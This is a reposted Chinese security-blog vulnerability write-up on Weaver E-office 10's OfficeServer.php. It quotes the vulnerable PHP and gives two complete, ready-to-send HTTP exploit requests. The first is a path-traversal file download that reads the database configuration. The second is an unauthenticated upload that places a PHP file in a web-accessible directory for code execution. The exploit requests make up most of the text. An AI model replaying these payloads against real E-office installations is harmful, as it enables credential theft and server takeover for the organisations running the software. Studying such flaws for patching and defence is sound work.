泛微E-office 10 OfficeServer.php 下载+上传漏洞分析

admin
admin
admin
138635
文章
114
评论
2024年8月18日21:31:49评论62 views字数 4246阅读14分9秒阅读模式

0x00 前言

搭建不耗费多少时间的 安装也是一步到位,泛微E-office V10是IonCube加密的,找IonCube的解密找了挺久,最终在P神的星球站里找到了在线解的功能.

泛微V10 安装包: https://pan.baidu.com/s/1SxunVTkpEq4BEzSVB0YSpA 提取码: 1994

泛微E-office 10 OfficeServer.php 下载+上传漏洞分析泛微E-office 10 OfficeServer.php 下载+上传漏洞分析泛微E-office 10 OfficeServer.php 下载+上传漏洞分析

泛微E-office V10整体为laravel lumen框架构建,所以也是继承了laravel框架的反序列化漏洞.

app: 程序核心源码bootstrap: 包含框架启动文件app.phpconfig: 配置文件database: 数据库文件ext: 扩展nodejs: js文件public: 包含index.php,进入应用程序的请求入口resources: 视图和未编译的资源文件routes: 路由定义,包含web.php(有的程序包含api.php、console.php等)storage: 包含由Balde框架生成的基于目录的模板、文件和缓存vendor: 包含composer依赖

0x01 前台任意文件下载漏洞

实际上在 /eoffice10/server/public/iWebOffice2015/OfficeServer.php 这个点存在一个非常明显的任意文件读取漏洞,我们只需要让 mOption 为 LOADFILE 即可读取任意文件.

<?phpswitch ($mOption) {    case "LOADFILE":        $mRecordID = $de_json["RECORDID"];        $mFileName = $de_json["FILENAME"];        $mFileType = $de_json["FILETYPE"];        $mFilePath = $mFilePath . "/Document/" . $mFileName;        error_log($mFilePath, 3, "a.log");        $result = file_exists($mFilePath);        if ($result) {            $fd = fopen($mFilePath, "rb");            $mFileSize = filesize($mFilePath);            $mFileBody = fread($fd, $mFileSize);            header("Content-type: application/x-msdownload");            header("Content-Length:" . $mFileSize);            header("Content-Disposition: attachment; filename=" . $mFileName);            ob_clean();            flush();            echo $mFileBody;            fclose($fd);        } else {            echo header("MsgError:404");        }        break;

Payload (读取数据库文件):

POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: max-age=0Connection: keep-aliveContent-Length: 225Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypHokEOoPMlNZHatMHost: 127.0.0.1:8010Origin: http://127.0.0.1:8010Referer: http://127.0.0.1:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.phpUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36  ------WebKitFormBoundaryLpoiBFy4ANA8daewContent-Disposition:form-data;name="FormData"{'RECORDID':'undefined','OPTION':'LOADFILE','FILENAME':'../../../config/database.php'}------WebKitFormBoundaryLpoiBFy4ANA8daew--

泛微E-office 10 OfficeServer.php 下载+上传漏洞分析下载下来的文件同样是IonCube 加密的,解密即可看到数据库账密.泛微E-office 10 OfficeServer.php 下载+上传漏洞分析

0x02 前台任意文件上传漏洞

同样位于 /eoffice10/server/public/iWebOffice2015/OfficeServer.php 存在 move_uploaded_file 函数上传文件到 /Document/ 目录,且无任何鉴权,导致漏洞产生.

<?php......$FormData = $_REQUEST["FormData"];error_log($FormData, 3, "a.log");$data1 = iconv("GB2312", "UTF-8//IGNORE", $FormData);$data1 = str_replace("'", """, $data1);$de_json = json_decode($data1, true);$mOption = $de_json["OPTION"];switch ($mOption) {    ...    case "SAVEFILE":        $mRecordID = $de_json["RECORDID"];        $mFileName = $de_json["FILENAME"];        $mFileType = $de_json["FILETYPE"];        $mUserName = $de_json["USERNAME"];        $mFile = $_FILES["FileData"]["tmp_name"];        error_log($mFile, 3, "a.log");        $mFilePath = $mFilePath . "/Document/" . $mFileName;        error_log($mFilePath, 3, "a.log");        if (is_uploaded_file($mFile)) {            if (move_uploaded_file($mFile, $mFilePath)) {                $mFileSize = $_FILES["FileData"]["size"];                $result = true;            } else {                $MsgError = "保存失败!";                $result = false;            }        } else {            $MsgError = "Uploaded_file Error";            $result = false;        }        break;    ...}?>

Payload:

POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: max-age=0Connection: keep-aliveContent-Length: 410Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBHpS0kA1AXWpICh2Host: 127.0.0.1:8010Origin: http://127.0.0.1:8010Referer: http://127.0.0.1:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.phpUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36------WebKitFormBoundaryLpoiBFy4ANA8daewContent-Disposition:form-data;name="FileData";filename="fuck.php"Content-Type:application/octet-stream<?php phpinfo();?>------WebKitFormBoundaryLpoiBFy4ANA8daewContent-Disposition:form-data;name="FormData"{'USERNAME':'admin','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'fuck.php'}------WebKitFormBoundaryLpoiBFy4ANA8daew--

泛微E-office 10 OfficeServer.php 下载+上传漏洞分析发送数据包后显示空白,实际已经传上去了,访问 /eoffice10/server/public/iWebOffice2015/Document/fuck.php 即可.泛微E-office 10 OfficeServer.php 下载+上传漏洞分析

标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转,RCE

 

原文始发于微信公众号(星悦安全):(Nday)泛微E-office 10 OfficeServer.php 下载+上传漏洞分析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月18日21:31:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微E-office 10 OfficeServer.php 下载+上传漏洞分析https://cn-sec.com/archives/3077237.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息